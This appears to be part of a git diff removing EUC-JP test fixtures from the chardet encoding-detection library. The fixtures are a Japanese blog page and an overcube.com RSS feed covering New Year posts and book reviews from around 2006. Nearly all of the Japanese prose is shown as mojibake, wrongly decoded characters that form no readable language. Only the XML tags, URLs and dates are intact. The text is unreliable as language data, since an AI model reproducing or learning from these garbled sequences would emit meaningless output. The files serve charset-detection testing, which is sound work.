    -¡ײ₪³₪ֳ₪ֱ₪־₪₪¦¡׳₪ָ₪₪₪ן₪ל₪ֶ₪ג¡¢₪³₪ֳ₪ֱ₪־ֶ»₪¬ָז±ֳ»³₪ֵֻ׀₪כֶֻ»¡£
    -÷₪ַֿ₪·₪ֶ₪₪₪כ₪ָ¡¢
    -¡ײּ¶פ¾ו¿ֽ¡׳₪־ֳֿ₪ע₪·»ֿ₪ב₪₪·₪¿¡£ֹ₪«₪ֳ₪¿₪־₪ַ¡¢ֵ׃ֳז₪ֶַ¨₪²½׀₪·₪ֶ₪­₪₪·₪¿¡£

    - -

    ּ¶פ¾ו¿ֽ₪ֳ₪ֶ²¿₪ְ₪ֳ₪¿₪־₪ְ₪ם₪¦¡£₪¿₪ײ₪ף¡¢₪³₪־»ת₪עֵצ₪ֶ₪כ¡£₪₪¼₪«ֳ־₪ֳ₪ֶ₪₪₪כ¡£
    -ג₪µמ₪ֳ₪ֶ¹װ₪¯»ה₪־ַ״₪ֻ¡¢ֿ·¿ֽ₪ֿ¡ײ¥ױ¥¡¥ֳ¥¯¥ז¥¦¡׳₪ָ°­ַֽ₪עֵך₪²₪ִ₪±₪₪·₪¿¡£₪₪ף₪ָ¥ֿ¥₪¥«¥י₪¡¢₪ָ»׳₪ֳ₪¿₪±₪ֹ¡¢÷£¹ֽ₪¨₪ֶ₪₪כ₪ָ₪¢₪כ₪₪₪ֿ¡ײַעֽ©¡׳₪ָ₪₪₪ֳ₪¿₪־₪«₪ג₪·₪ל₪₪₪¡£
    -ַעֽ©ְח¿ֽ₪ָ₪ֿ¡¢ַע±£ֱµ»ױ₪¬ַעְמ₪־»³₪־ֳז₪ַ²ס₪ֳ₪ֶ¡¢ֲֹ₪ע¹מֹ‏₪¹₪כ¶µ₪¨₪ע₪µ₪÷₪«₪ֳ₪¿¿ֽ₪ַ₪¹₪¬¡£

    - -

    ¶²ֲֳֹֿ¢

    - -

    ₪³₪ל₪ֿ¡¢₪×ֲֳֿ¢₪µ₪ף¡£
    -₪ֹ₪¦₪₪₪¦₪ן₪±₪«ֶ¶·¢₪־₪ט₪¦₪₪ָ₪³₪ם₪ֻ₪₪₪י₪ֳ₪·₪ד₪₪₪₪¹¡£ַעֽ©ְח¿ֽ₪ֶֿ¶·¢₪־ֳז₪ֻ½»₪ף₪ַ₪₪₪¿₪½₪¦₪ַ₪¹₪¬¡£
    -₪³₪־ֹױ¶ב₪ֻ₪ַֿׁ²°₪¬₪¿₪¯₪µ₪ף₪¢₪ֳ₪¿¡£ֳ¯₪¬½»₪ף₪ַ₪₪₪¿₪־₪ְ₪ם₪¦¡£

    - -


    -¡ת´י₪¬₪₪₪¡¢₪×ֶ²₪¬₪₪₪

    - -

    ¥±¡¼¥ײ¥כ¥«¡¼₪ָ¥ם¡¼¥׳¥¦¥§¥₪₪־ֳז·ְֳֵֿׁ₪₪ֵַ‏ֳ£¡£
    -₪₪ֵ׀₪ך₪­₪ֳ₪¿₪ן₪±₪ַ₪¹¡£

    - -

    ₪¢₪¢₪·₪ף₪ֹ₪«₪ֳ₪¿¡£
    -₪½₪ל₪ֻ¡¢₪₪ף₪ָ₪ג₪ֿ₪ה¡ִֹ₪«₪ֳ₪¿¡£ֳזְ₪₪־»‏ֲו₪ע־¹₪·₪ֶ₪כ₪ט₪¦₪¡£

    - -

    ₪ט₪¦₪ה₪¯´ׁ¸קµׂ₪־»ׁ₪ג¸«₪¨₪₪¹¡£₪₪₪ִ₪ג₪ֿ₪¦₪¶₪₪₪ָ»׳₪ֳ₪ֶ₪כ´ׁ¸קµׂ₪־ֲֳִ־₪ג¡´ְ¡ֻ¡¢÷£₪ֿ¸«₪«₪±₪כ₪ָ₪₪ֳ₪ָ₪¹₪כ¡£
    -₪·₪«₪·¡¢´ׁ¸קµׂ₪ֿ¥±¡¼¥ײ¥כ₪«₪י¥ם¡¼¥׳¥¦¥§¥₪₪״¡£
    -»ה₪ֿ¥µ¥₪₪־³ׁ₪־₪ט₪¦₪ֶָֻ₪ך¡¢ֶ»₪·₪כ₪₪ֻ₪·₪¿₪¬₪ֳ₪ֶ¡¢¼ב²אֶ²¡¦÷¬ֳֻזֶ²₪״₪א₪«₪¦¡£
    -₪₪ְ¡¢µק־¥₪ֿ₪ְ₪₪₪ײ₪¢₪כ₪ט₪¦₪ַ₪¹₪¬¡¢µ₪÷ה₪ֿ₪₪µ₪½₪¦¡£

    - -

    ¹׃־ֳ₪־₪¹₪¹₪­

    - -

    ₪ָ₪₪ָ₪ג₪₪₪ֶ₪₪₪­₪₪¹¡£
    -¿ֽ¹©¥¹¥­¡¼¾ל₪¬ִ÷¿ֳז₪ַ¡¢¥¹¥¹¥­¥צ¸¶₪ָ²½₪·₪ֶ₪₪₪ֶ¡¢¼ֲ₪ֻ₪µ₪׃₪·₪₪ֹק·¡£°לֵָּ×₪¡ײ½©₪־µ‏ֵװ¡׳₪־¥₪¥ב¡¼¥¸₪«₪י₪ֿ₪«₪±־¥₪ל₪¿¸ק·₪ַ₪¹¡£
    -₪ַ₪ג¡£ָז±ֳ»³₪ֻֽֿט¡¢´ׁ¸קֳֿ₪ַ₪ֿ₪₪¯½₪¹װ₪־¾ל₪ְ₪«₪י¡¢₪³₪־₪ט₪¦₪»ׁ₪¬ֵֻצ₪₪־₪«₪ג₪·₪ל₪₪₪¡ִ₪₪ֹ₪ָ¹ֽ₪¨₪₪¬₪י¿₪ף₪ַ₪₪₪כ₪ָ¡¢₪₪¿¸ֵ₪₪ְ׀©₪עָ¯¸«¡£

    - -

    ´י₪¬₪₪₪

    - -

    ´י₪¬₪₪₪¡£
    -¥·¥כ¥¯¥ם¡¼¥ֹ₪־ְ׀·¢₪־©ֱ₪₪¿₪₪¡£·כ³¦₪עַֻ₪ֳ₪ֶ¡¢²¿¼װ₪«₪¬¿¯ֶ‏₪·₪ֶ₪₪₪כ₪־₪ַ₪·₪ח₪¦₪«¡£

    - -

    ₪ָ₪­₪×₪ך¸½₪ן₪ל₪כ¸ֵ₪₪ֶ»₪·₪כ₪₪ע₪¿₪ט₪ך₪ֻ¡¢¿₪ף₪ַ₪₪₪¯₪¦₪ֱ¡¢¹­¡¹₪ָ₪·₪¿₪ָ₪³₪ם₪ֻ½׀₪₪·₪¿¡£
    -¸«ְ²₪י₪·₪ֿ₪₪₪₪₪־₪ַ₪¹₪¬¡¢₪₪ף₪«ֹװµ₪ּ£₪¾ל½ך¡£ַע₪₪¸ֿ₪לּ₪¬¡¢ֶֻ³₪₪־´ֹ₪־ּ₪־₪ט₪¦₪ֻ¡¢ֹק₪־·ֱ₪ֻ¸ַ₪₪ֳ₪ֶ₪₪₪₪¹¡£
    -¹ג»³ֲֳֿ׃₪₪¿₪₪₪ֻ¡¢¹ג₪₪¼שּ₪¬₪₪¯¡¢³«₪±₪ֶ₪₪₪כ¾ל½ך¡£

    - -

    ¸זֶ²₪־ְ׳

    - -

    ְ׀₪¬½¸₪ב₪י₪ל₪ֶ¡¢¡ײ¸זֶ²ְ׳¡׳₪ָ½ס₪₪₪ֶ₪¢₪ך₪₪·₪¿¡£ְֱֳ׀₪ְ₪ֳ₪¿₪י₪·₪₪ְµ‎·ֱ₪־ְ׀₪¬¡¢₪₪ִ₪י₪ל₪ֶ₪₪₪₪¹¡£

    - -

    ÷¬ֳֻזֶ²₪ט¡¢₪ֹ₪³₪״¡©¡¡©¶µ₪ַּֿ₪ף₪ְ₪־₪«¡©

    - -

    ¡ִ₪ֹ₪¦₪ה₪יֶ»₪ע´ײ°ד₪¨₪ֶ₪¿₪ט₪¦₪ַ₪¹¡£
    -¥¬¡¼¥ַ¥ף¥¥ו¡¼¥¸¥¢¥א₪־₪₪¦₪«₪י¹װ₪±₪׀₪ט₪«₪ֳ₪¿₪־₪ַ₪¹₪¬¡¢¶בֶ»₪ע₪·₪¿₪»₪₪₪ַ¡¢₪₪ֻ₪«ֲחְ־₪־₪×ֶ²₪־ְ׳₪ֻֽט₪ֶ₪·₪₪ֳ₪¿₪י₪·₪₪¡£

    - -

    ְײ₪₪¼ש

    - -

    ¸«ֳ־₪י₪ְּײ₪₪¼שּ₪¬¡¢·ל₪־¿§₪ֻ¹ָֽױ₪·₪ֶ₪₪₪₪·₪¿¡£¿ש₪־₪ט₪¦₪¾ן־׀¼ש₪ֻ»ק₪¿ּ₪₪־₪ֻ¡¢¹ָֽױ₪·₪ֶ₪₪₪¿¡£ֻצֻ¡₪־ְ₪¡©

    - -


    -¡ת¿ו½ק

    - -

    ָז±ֳ₪־¹ָֽױ£³

    - -

    ₪₪₪ם₪₪₪ם¶לֿ«₪·₪¿₪±₪ֹ¡¢₪ט₪¦₪ה₪¯¼ב²אֶ²₪ֵֻ‏ֳו¡£
    -¹ָֽױ¡¢₪­₪ל₪₪₪ַ₪·₪¿¡£

    - -

    ָז±ֳ₪־¹ָֽױ¥¢¥ֳ¥׳

    - -

    µ¢₪ך₪ֿ¡¢ֶ»₪ג₪ן₪«₪ֳ₪¿₪·¡¢₪÷₪ף₪÷₪ף¿₪ף₪ַ₪₪₪­₪₪₪₪·₪¿¡£
    -¥¬¡¼¥ַ¥ף¥¥ו¡¼¥¸¥¢¥א₪ֻ₪ג´ף₪ך₪¿₪«₪ֳ₪¿₪±₪ֹ¡¢»‏´ײ₪־ֵװ¹ח₪ג₪¢₪ךֳַַ°¡£
    -₪ױ₪¿₪¿₪׃¥±¡¼¥ײ¥כ₪ָ¥ם¡¼¥׳¥¦¥§¥₪₪־ֳז·ְֳֵֿׁ₪״¡£

    - -

    ¥±¡¼¥ײ¥כ¥«¡¼₪ַ¹₪ך₪ט₪¦₪«₪ָ₪ג»׳₪ֳ₪¿₪־₪ַ₪¹₪¬¡¢₪³₪³₪₪ַֽט₪¿₪י¡¢µ¢₪ך₪גֵּג₪ָָבֱװ₪·ט°ױ₪·₪ֶ¡¢»³ֶ»₪״¡£
    -²¼₪ך₪ֿ¡¢ֵ׀₪ך₪ט₪ך₪ֿ¡¢₪÷₪ֳ₪ָ¥י¥¯₪ְ₪·¡£

    - -

    ֶ₪¬כ₪ל₪כֱ°₪ֻ²¼»³₪·₪¿₪₪₪־₪ַ¡¢₪«₪₪ךַתֱצ₪·₪₪·₪¿¡£
    -ֵ׃ֳז₪ַ¡¢¼ד₪₪½קְ­₪ָ₪¹₪ל°ד₪ֳ₪¿¡£¼ד₪₪÷¢₪־ֶ£½ד»ׂ₪½₪ֳ₪¯₪ך₪־¡¢₪ך₪ו₪¦₪ָ₪·₪¿ָ‏¿ֽ¡£
    -₪³₪ף₪»‏´ײ₪ֻ¡¢₪₪ְ»³₪ֵֻ׀₪כ₪־₪«¡¢₪ָֹװ»׳µִ₪ֻ»׳₪₪₪₪¬₪י¡¢₪¹₪ל₪ֱ₪¬₪¦₪ָ₪­¡¢¡ײ₪³₪ף₪ֻ₪ֱ₪ֿ¡׳₪ָ¡£
    -₪¢₪ן₪ֶ₪ֶ¡¢₪³₪ֱ₪י₪ג¡¢₪₪½₪₪½₪·₪¿ְ¼₪ַ¡¢¡ײ₪³₪ף₪ֻ₪ֱ₪ֿ¡׳¡£
    -²ײ₪־¹ב₪ך₪ע»ִ₪·₪ֶ¡¢½קְ­₪ַֿ״¸ו₪ֻµמ₪ֳ₪ֶ₪₪₪­₪₪·₪¿¡£

    - -

    ₪·₪׀₪י₪¯₪·₪ֶ¿¶₪ךײ₪כ₪ָ¡¢ָא½ק₪ֿ₪ג₪¦₪÷₪₪₪ײ₪ף¹ג₪₪₪ָ₪³₪ם₪₪ֵַ׀₪ֳ₪ֶ₪₪₪₪·₪¿¡£°ֽֽ₪ֱֻבֲ­₪ַ₪¹¡£´·₪ל₪ֶ₪₪₪כ₪־₪ַ₪·₪ח₪¦₪«¡£
    -¸«₪ֶ₪₪₪כ₪ָ¡¸«₪ָ₪ל₪ֶ₪₪₪כ₪ָ¡ֻ¡¢ָא½ק₪ג¿¶₪ךײ₪ֳ₪¿¡£¾׀₪ֳ₪¿¡£¥­¥ִ¥ֽ₪־₪ט₪¦₪ַ₪·₪¿¡£ַע₪₪¡£µ₪ֻ¡¢₪ֹ₪³₪«₪יֲל₪־²»₪¬¹₪³₪¨₪¿¡£½ק₪ֿ₪³¡¼₪ף₪ִָ·₪ֽ₪¿¡£

    - -

    ֹ₪₪₪־₪ַ¡¢₪½₪ל₪«₪י¡¢¶ן₪±₪כ₪ט₪¦₪ֻ₪·₪ֶ¡¢₪ױ₪ג₪ָ₪₪ַ¡£
    -₪ן₪÷₪«£µ£°¬₪ַ₪­₪י₪י÷ה₪ע²¼₪ך₪­₪ך¡¢₪₪₪ִ₪ג₪־¸«´·₪ל₪¿ֹק·₪־ֽ¼‎₪¬¡¢₪½₪³₪ֻ₪¢₪ֳ₪¿¡£₪₪ֳ₪ָ₪ׂ₪ָ°ֲ¿´¡£

    - -

    ֲ­₪¬ִֻ₪₪₪₪¢¡£¡£

    ]]> -
    -
    - -
    \ No newline at end of file diff --git a/chardet/tests/EUC-JP/overcube.com.xml b/chardet/tests/EUC-JP/overcube.com.xml deleted file mode 100644 index e3f2098..0000000 --- a/chardet/tests/EUC-JP/overcube.com.xml +++ /dev/null @@ -1,77 +0,0 @@ - - - - - -AZ::Blog ₪ֿ₪ף₪₪ך¡¢₪¢₪÷₪­¿§₪־¥¦¥§¥ײ¥ם¥°¡ש -http://www.overcube.com/blog/ - -ja - -2006-01-01T00:00:00+09:00 - - - - - - - - - - - - - - - -₪¢₪±₪₪·₪ֶ₪×₪ב₪ַ₪ָ₪¦₪´₪¶₪₪₪₪¹ -http://www.overcube.com/blog/archives/000681.php - ₪¢₪±₪₪·₪ֶ₪×₪ב₪ַ₪ָ₪¦₪´₪¶₪₪₪₪¹¡£ ÷£ַ¯₪ג₪ט₪ם₪·₪¯₪×´ך₪₪₪·₪₪¹¡£ ÷עּכ¡₪ָ₪₪₪¦₪«¡¢₪ִ₪₪₪µ₪ֳ₪­₪₪ַ¡ֻ¡¢ֶֽ´׃¹©»צ₪ַ½ס₪­¾ו₪²₪¿ַ¯²ל¡£ ¡¥¯¥ך¥ֳ¥¯₪¹₪כ₪ֲָח₪­₪¯₪₪ך₪₪¹¡£±¦₪«₪י÷¸₪ֶֹֻ₪ף₪ַ¥ֽ¡£¡ִ₪µ₪י₪ֻ¡¢¥¿¥₪¥׳£ֲ₪ג÷מְ®¡£¡ֻ ·כ¶ֹ¡¢÷ַ¸ו₪₪ַ₪¢₪ן₪¿₪ְ₪·₪«₪ֳ₪¿÷עַ¯₪ַ₪·₪¿¡£ ÷£ַ¯₪ֿ¥°¥¦¥¿¥י₪ֻ²ב₪´₪·₪¿₪₪₪₪¢¡£ ¶µ°י¥ֶ¥ל¥׃₪ֳ₪ֶ¡¢₪×ְµ·מ₪«₪י₪₪₪­₪₪ך₪×₪¸₪ד₪כ´¥¹¥¥·¥ד¥כ₪ְ₪₪¢¡£ַ¯ֻצ₪־ָ¿ְןֳֶ½¸₪ֿ₪₪ף₪ְ₪ֳ₪¿₪ף₪ְ¡£¡£ £²£°£°£¶ַ¯¡¡¸µֳ¶... - -overQ -2006-01-01T00:00:00+09:00 - - -£²£°£°£¶ַ¯¡²ֽ¶ץ¡ֻ¥¥¹¥ָֻ¡¦₪½₪־£² -http://www.overcube.com/blog/archives/000680.php -₪ָ₪₪₪¦₪ן₪±₪ַ¡¢ֱ°₪־µ­»צ₪־ֲ³₪­¡£ֽטַ¯₪־¥¥¹¥ָֻ¡¢£²°ּ₪ָ£±°ּ₪ַ₪¹¡£ ÷£ַ¯₪־¥¨¥ף¥ָ¥ך₪ֿ₪³₪ל₪ַ₪×₪·₪₪₪¡£ ÷עַ¯₪ֻ°ת₪­ֲ³₪­¡¢÷£ַ¯₪ג¥ײ¥ם¥°₪עִּ₪¸₪ֶ¡¢₪₪₪ם₪ף₪‎₪ָ½׀²ס₪₪¡¢ֽ·₪ף₪ַ₪₪₪¿₪ְ₪₪₪ֶ¡¢₪ָ₪ֶ₪ג³₪·₪«₪ֳ₪¿₪ַ₪¹¡£₪¢₪ך₪¬₪ָ₪¦₪´₪¶₪₪₪₪·₪¿¡£ ₪₪¿¡¢ֽטַ¯₪ג₪ט₪ם₪·₪¯₪×´ך₪₪₪·₪₪¹¡ש ֲט£²°ּ¡¡¡ײ»׀»ץֳµִו»צּ³½ך¡¥¥₪¥¥¹£±µי₪ֿ»¦₪·₪־¥י¥₪¥»¥ף¥¹¡׳ »ה₪ֿ»׀»ץ»ב¡£ ¥¥₪¥¥¹£±µי¥י¥₪¥»¥ף¥¹₪ע₪ג₪ִ¡¢µ¶ֲ₪₪־¥¨¡¼¥¸¥§¥ף¥ָ₪ְ¡£ »ה₪־µ¶ֲ₪₪ֿ¡¢₪½₪¦¥«¥ף¥¿¥ף₪ֻ₪ֿ¸«ָ´₪±₪₪₪¡£¥¥ף¥·¥ח¥ף¡¦¥¥ֶ¥כ₪־µ¶ֲ₪₪₪ֹ¡¢₪₪ְ₪₪ְ½ר₪־¸‎¡£ »ה₪־¼ך₪¬₪±₪¿µ¶ֲ₪₪ֿ₪₪₪¿₪כ₪ָ₪³₪ם₪ֻµ₪ײ¡£ »׀»ץ»ב₪ֿ₪ׂ₪ָ₪ך₪־ּ¾ֱ°₪ַ₪ֿ₪₪¯¡¢¥¨¡¼¥¸¥§¥ף¥ָ₪ֻֽ¿₪¨₪י₪ל₪¿₪ן₪¶₪־ֱם¾־₪ַ₪¢₪כ₪«₪י₪ְ¡£ ְט½µ¡¢·¯₪־±»ץ₪־µֽ₪ב×₪¬₪ֿ₪÷₪ל₪¿₪־₪ֿ¡¢¥¢¥¥כ¥¬¥א₪־ֵ´¶־ּ₪¬¸÷₪י₪µ₪ל₪ֶ₪₪₪¿₪«₪י₪ְ¡£ ·ײ¸קֵפ₪¬ֱֶֽ³₪ִ₪«₪₪¯₪₪ֳ₪ֶ°ֵ₪₪ּכ₪ע²ב₪´₪·₪¿·׀¸³₪¬₪¢₪כ₪¢₪₪¿¡£₪½₪ל₪ֿ»ה¡¢»׀»ץ»ב₪ֻ₪ט₪ֳ₪ֶ¡¢¹½ֲ₪·׳»»½ס₪¬½ס₪­´¹₪¨₪י₪ל₪¿₪¿₪ב¡£ ₪₪ְ₪₪ְ₪¢₪כ¡£ ֳ¦ְ‏»צ¸־₪־¸¶°ר₪ָ₪µ₪ל₪כֵ´ֶ»²ס¼ׂ₪־¡ײ¹½ֲ₪¾ו₪־ּהֲך¡׳¡£ ֽ¿ֲֵח¾¡ֽר₪ע»₪¨₪כ¿·¿ֽµִ°ק₪־¡ײֵ´¶¡₪¹₪¸₪¬₪ֽ¡ֻ¡׳₪עָ´₪₪₪ֶ₪×₪₪₪¿₪־₪ג¡¢»׀»ץ₪־»ֵ¶ָ¡£ ÷£ַ¯÷ַ₪ג²װ₪₪₪ְ¥¿¥ל¥ף¥ָ¡¢₪₪־₪ָ£ָ£ַ¡£₪ָ₪ג₪ֻ¹ר₪־¡ײֵ´¶־ּ¡׳₪ֻּהֲך₪¬₪¢₪כ¡£¿ֵּ£µ°¾ו₪־ֳֿ¿ּ₪¬ֽט₪ל₪׀¡¢¹ר÷ױ₪±₪כ₪ְ₪ם₪¦¡£ ¿¿±₪ֿ₪₪¼¥ױ¥£¥®¥ו¥¢ֲוֹ½₪ֻ₪₪ל₪₪₪¡£ ÷£÷¢₪ֻ₪₪ֳ₪ֶָ¯³׀₪¹₪כ¥¢¥¹¥¥¹¥ָ²ׂ¡£÷£÷¢₪ֻ₪₪ֳ₪ֶ²ף¼‎₪µ₪ל₪כֲח¼ךֵֵµ¡¥ב¡¼¥«¡¼₪־¥ױ¥¡¥ף¥ׂ¡¼¥¿¡¼¡£»צ·ן₪ֻ₪₪כ₪₪ַ¡ײµ¶ֱץ¡׳₪ֿ¸«ָ´₪±₪₪₪¡£ ֳז¿ָ₪ֿ²¿₪גׁ₪ן₪ֳ₪ֶ₪₪₪₪־₪ֱִֻך³°₪־¾ו¾÷₪ע¸«₪»₪כ³פ²ֱ¡£ ֳז¿ָ₪ֿ²¿₪גׁ₪ן₪ֳ₪ֶ₪₪₪₪־₪ֻ¥¥¹¥ָ¥»¥י¡¼₪ֻ₪₪כֻ¡¢ַה₪ל₪כ¾¦ֹ¡£ ֳז¿ָ₪ֿ²¿₪גׁ₪ן₪ֳ₪ֶ₪₪₪₪־₪ֶֻ´₪ל₪־¥»¥ל¥ײְ¸³ט¡£ °ֲ₪¹₪®₪כ¥¥ף¥·¥ח¥ף₪ָ»ק₪ֶ₪ֿ₪₪₪₪₪₪«¡£ ֵ´¶₪ֿ₪ֱ₪ד₪ף₪ֶָ‏₪ֳ₪ֶ₪₪₪כ₪־₪«¡£²ֱֳֽ₪־¹½ֲ₪·׳»»₪ֿµ¶ֱץ₪µ₪ל₪ֶ₪₪₪₪«¡£ ִֽ½ק»¦¿ֽ₪¬ֿ¢ֲ³₪·₪ֶµ¯₪³₪ֳ₪¿₪ָ₪­¡¢₪ױ₪ָֹװ°ֲ₪ֻ₪₪כֶֻ₪־¹½ֲ₪¾ו₪־·ח´¡¢ֵ´¶־ּ₪־ֹװֲ­¡ִ¡£ ¥¥₪¥¥¹£±µי¥י¥₪¥»¥ף¥¹₪ע¼טְֶ₪¹₪כֶֻ¿ֽ₪ֿ₪₪₪¿₪כ₪ָ₪³₪ם₪ֱַ‎₪¨₪ֶ₪₪₪כ¡£¥ג¥י¥כ¥ֿ¥¶¡¼¥ֹ¡£ַה₪ל₪ל₪׀₪ט₪·¡£ ₪₪₪ה¡¢ַה₪י₪₪±₪ל₪׀¡¢²¿₪ג₪ֹ₪¦₪·₪ט₪¦₪ג₪₪₪₪ַ₪ֿ₪₪₪₪«¡£ְ¸₪­₪כ₪³₪ָ₪ַֿה₪כ₪³₪ָ₪ְ¡£ ¥­¥₪גֳ־₪י₪₪₪₪¦₪ֱ₪ֻ¡¢»׀»ץ»ב₪ָ₪₪ֳ₪ֶ₪₪₪כ₪«₪ג₪·₪ל₪₪₪¡£... -book -overQ -2005-12-31T20:14:25+09:00 - - -£²£°£°£¶ַ¯¡²ֽ¶ץ¡ֻ¥¥¹¥ָֻ¡¦₪½₪־£± -http://www.overcube.com/blog/archives/000679.php -₪¿₪יֻ£±£¹₪־ֶף₪ִּ₪־₪×ֲך₪ֿ¡¢¡ײ£²£°£°£µַ¯₪־¥¥¹¥ָֻ¡׳₪ַ₪·₪¿¡£₪³₪ֱ₪י₪ֻ₪ג₪×ֵת₪¨₪·₪¿₪¯₪ֶ¡¢₪₪₪ם₪₪₪ם¹ֽ₪¨₪ֶ₪ֿ₪₪¿₪־₪ַ₪¹¡£₪¬¡£ ₪·₪«₪·¡¢¹ֽ₪¨₪ע₪ב₪°₪י₪¹₪¦₪ֱ¡¢ִ¾¶ב₪־₪³₪ָ₪·₪«»׳₪₪½׀₪»₪₪₪»ה₪¬¡¢₪½₪³₪ֻ₪ֿ₪₪₪¿₪־₪ַ₪¢₪ֳ₪¿¡£ ₪³₪³10ֶ₪¯₪י₪₪₪ֶַֹ₪ף₪ְ¥¥¹¥ָֻ₪·₪«₪ן₪«₪י₪ף₪ַ₪¹¡£¡₪ֱ₪₪₪ֻ¡¢₪½₪ל₪ֿ¥ל¥א¡ײֵ·₪־ְ¼¡¦¸ֱֿנַ®¡׳¡ֻ¡£ ₪ָ₪₪₪¦₪ן₪±₪ַ¡¢ֽטַ¯₪ְ¡££²£°£°£¶ַ¯₪־¥¥¹¥ָֻ₪ע¸₪ִ₪׀₪«₪ך¡£ ²ב₪®µמ₪ך₪·ֶ¡¹₪־₪³₪ָ₪ֻֿ÷₪ל₪ֶ₪ג¡¢ּ₪ֽט₪־₪³₪ָ₪₪י₪×₪₪¨₪ֶ₪₪₪כ»ה₪ַ₪¹¡£ ַ¯ֻצ¹±־ד´כ²ט₪־₪ט₪¦₪µ₪₪ג₪·₪ֶ₪­₪₪·₪¿¡³(¡­¡¼¡®)¥־ ִ¹₪¯₪₪ֳ₪¿₪־₪ַ¡¢ֶף₪ִ₪ֻ¬₪±₪₪·₪¿¡£₪₪÷₪ֿ¡¢¸°ּ₪«₪י»°°ּ₪₪ַ¡£ »ִ₪ך₪ֿ½ּכ₪־¾ג₪־ִּ₪כ÷¢₪ֻ¡£ ֲט£µ°ּ¡¡¡ײ¥¸¥ח¥»¥ױ¡¦¥ײ¥ם¥°₪־ְ¸³¶¡׳ ¥ײ¥ם¥°₪־ֱֿ»ֿ¼װ¡¢¥¸¥ח¥»¥ױ¡¦¥ײ¥ם¥°¡£ £¹ְ₪µ×¥־¥ײ¥´¥ם¥ֹ₪ֳֻ¼₪עָ¯₪¹₪כ¥ײ¥ם¥°²ָ¡¢₪½₪־ֲט£¶£¶ֲוֵצ¼ח₪ַ₪¢₪כ¥¸¥ח¥»¥ױ₪־¡¢ִֽ¾¯»‏₪־»׳₪₪½׀₪«₪י׸ל₪ֿ»ֿ₪₪כ¡£ ¾¯ַ¯¥¸¥ח¥»¥ױ₪ֿ₪ײ°ֹ₪־ֳֿ²¼₪עֳµ¸¡ֳז¡¢¥³¥¦¥ג¥ך₪¿₪ֱ₪־·²₪ל₪ֻ½׀²ס₪¦¡₪ֱ₪₪₪ֻ¡ײ¥׀¥ֳ¥ָ¥¥ף¡¦¥׃¥®¥ף¥÷¡׳₪־¸¶÷מ₪ֻֿ½ס₪ַ₪¢₪כ¡ֻ¡£ ₪½₪·₪ֳֶֿµו₪־ֶגֹפ₪ֿ¥ײ¥ם¥°²ֲָו¡¹₪־ֵ״־ֿ₪ֻ₪ט₪ך¡¢·¡₪ך₪ִ₪¯₪µ₪ל¡¢¶ץֶ¶₪ֻ₪₪ֳ₪ֶ₪₪₪כ₪³₪ָ₪עָ¯¸«₪¹₪כ¡£ ₪×ץֳµ₪·₪־²ָ·ֿ₪ַ₪¢₪ֳ₪¿¥ײ¥ם¥°²ָ₪ֿ¡¢·¡₪ך₪ֻ·¡₪ֳ₪¿₪¹₪¨¡¢₪ִ₪₪₪ֳֻֿµוֶגֹפ₪ע·¡₪ך₪ִ₪¯₪·₪ֶ₪₪₪¿₪־₪ְ¡£ ₪×ץ₪ֿ₪₪«₪ֳ₪¿₪־₪ְ¡£¶ץ₪ֳ₪₪ְ¡£ ₪·₪«₪·¡¢¥¸¥ח¥»¥ױ₪ָֿ¯ֱ₪עµױֵ¾₪¹₪כ¡£ ¥³¥¦¥ג¥ך₪ע¼ך₪₪÷₪±¡¢ֱֵ½ס¥³¥¦¥ג¥ך₪ֻ»ֵ־©₪ֶ¾ו₪²¡¢ְ₪³¦÷ֳַ»µק־¥₪־ִּ¿®ּײ₪ע¹½ֳ¡£ֳ¯₪ג₪¬ֳ־₪כ¡¢¥₪¥ף¥¿¡¼¥ֽ¥ֳ¥ָ₪־µ¯¸»₪ַ₪¢₪כ¡£ ¥¸¥ח¥»¥ױ₪־¼«ֱֵ¡ײ¶ץµץ₪«₪יְ¸₪₪ל₪¿ֹ¡׳₪ֿ£²£±ְ₪µ×÷ַ½י₪־¥¥¹¥ָ¥»¥י¡¼¡£ ₪·₪«₪·¡¢ֻ½ס₪ַ₪ֿ¡¢¼«ֱֵ₪ַ¸ל₪י₪ל₪₪«₪ֳ₪¿¥¸¥ח¥»¥ױ₪־ֱַ´י₪¬ֱֹ₪«₪ל₪כ¡£ ¥¹¥ׁ¥א¥³¥ב¥ף¥ָ₪עֱֻ₪א₪¿₪ב¡¢₪׿§µ₪¥ב¥¹¥³¥¦¥ג¥ך₪ֻ₪ט₪ֳ₪ֶ¡¢¥¹¥ׁ¥א¥³¥¦¥ג¥ך₪ע°לּײֲַ¿װ₪ֻ₪¹₪כ₪₪ֹ¡¢´סָ´₪ָ¯ֱ₪ְַ₪³¦₪עׁ₪¨₪ֶ₪₪₪¯¡¢¥¸¥ח¥»¥ױ¡¦¥ײ¥ם¥° 33rd¡£ ₪µ₪י₪ֻֻ½ס₪ַ₪ֿ¡ײ÷ַ½י₪־¥ָ¥י¥ֳ¥¯¥׀¥ֳ¥¯¡׳₪־ֶז₪¬½י₪ב₪ְֶּ₪«₪µ₪ל₪כ¡£ ₪½₪ל₪ֿ£±£³ְ₪µ×¡¢¥ײ¥ם¥°²ֲָט£±£±ֲו₪־÷¢¡£¥־¥ײ¥´¥ם¥ֹ₪ֿ₪₪₪ן₪ז₪כ¡ײ¥¿¥¿¡¼¥כ₪־₪¯₪׃₪­¡׳₪־₪ג₪ָ₪ֻ₪¢₪ֳ₪¿¡£ ¥ײ¥ם¥°²ָ₪־ּז¾ֿ₪ַ₪¢₪כ¡¢¸׳₪ְָן₪¦ֶ₪־₪ט₪¦₪¥±¥ג¥־₪־¿ֱ₪¬ִך₪ב₪י₪ל₪¿₪־₪ג¡¢₪³₪־÷¢₪ְ¡£ ֶ₪־₪ט₪¦₪¥±¥ג¥־₪ֿ¡¢א׃¡£¸׳₪ֿ¥ג¥ף¥´¥כ₪עֹ½₪·¡¢¶¯ֵ¨₪ֲֻ׀₪·₪ֶֹ½־©₪ֳ₪ֶ₪ְֿן₪ן₪₪₪₪¬¡¢ּ´₪־ֳז₪ַ₪½₪³₪ֿ₪«₪ָ₪₪¯¿»¿©₪¹₪כא׃₪ָ₪·₪ֶ¡¢¥ײ¥ם¥°²ָ₪ֿ»‏ֲו₪עְ¸₪­±ה₪׃₪¿₪־₪ְ¡£ ₪¹₪₪ן₪ֱ¡¢¡ײ¸׳¡¢¿©₪¦¡¢א׃¡׳¡£¥ָ¥י¥ֳ¥¯¥׀¥ֳ¥¯¡ִ¡£ 